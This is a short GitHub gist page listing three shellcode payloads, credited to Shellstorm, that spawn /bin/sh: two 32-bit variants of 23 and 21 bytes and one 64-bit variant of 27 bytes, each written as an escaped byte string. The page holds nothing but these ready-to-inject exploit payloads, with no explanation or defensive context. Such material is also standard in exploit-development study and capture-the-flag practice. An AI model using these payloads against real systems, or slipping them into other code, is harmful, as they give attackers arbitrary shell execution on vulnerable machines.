Skip to content

Instantly share code, notes, and snippets.

@grittyninja
Last active August 12, 2016 01:27
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save grittyninja/64cf24c311acf7cd1ec652ebefec59ed to your computer and use it in GitHub Desktop.
Save grittyninja/64cf24c311acf7cd1ec652ebefec59ed to your computer and use it in GitHub Desktop.
[[ Spawning /bin/sh ]]
#### BY SHELLSTORM ####
# 32 bit
## 23 bytes
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
## 21 bytes
"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
# 64 bit
## 27 bytes
"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment